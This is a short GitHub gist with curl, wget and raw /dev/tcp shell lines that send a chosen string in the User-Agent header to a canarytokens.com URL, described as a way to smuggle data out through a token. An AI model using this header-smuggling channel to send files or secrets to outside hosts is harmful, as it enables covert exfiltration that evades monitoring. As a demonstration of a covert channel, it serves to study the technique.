Created
May 18, 2020 01:55
-
-
Save Sawaba/2082f4827ffdbf91e3cb5f8fad4fb66d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s -A "smuggled message" http://canarytokens.com/tokenurl | |
wget -U "smuggled message" http://canarytokens.com/tokenurl | |
exec 3<>/dev/tcp/canarytokens.com/80 | |
echo -e "GET /articles/traffic/guln4qekd7zjfd4thw5sw48uh/post.jsp HTTP/1.1\r\nUser-Agent: If i trip my own token, i can pass it any useragent info i want to, effectively smuggling data in a token\r\nHost: canarytokens.com\r\nAccept: */*\r\n\r\n">&3 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment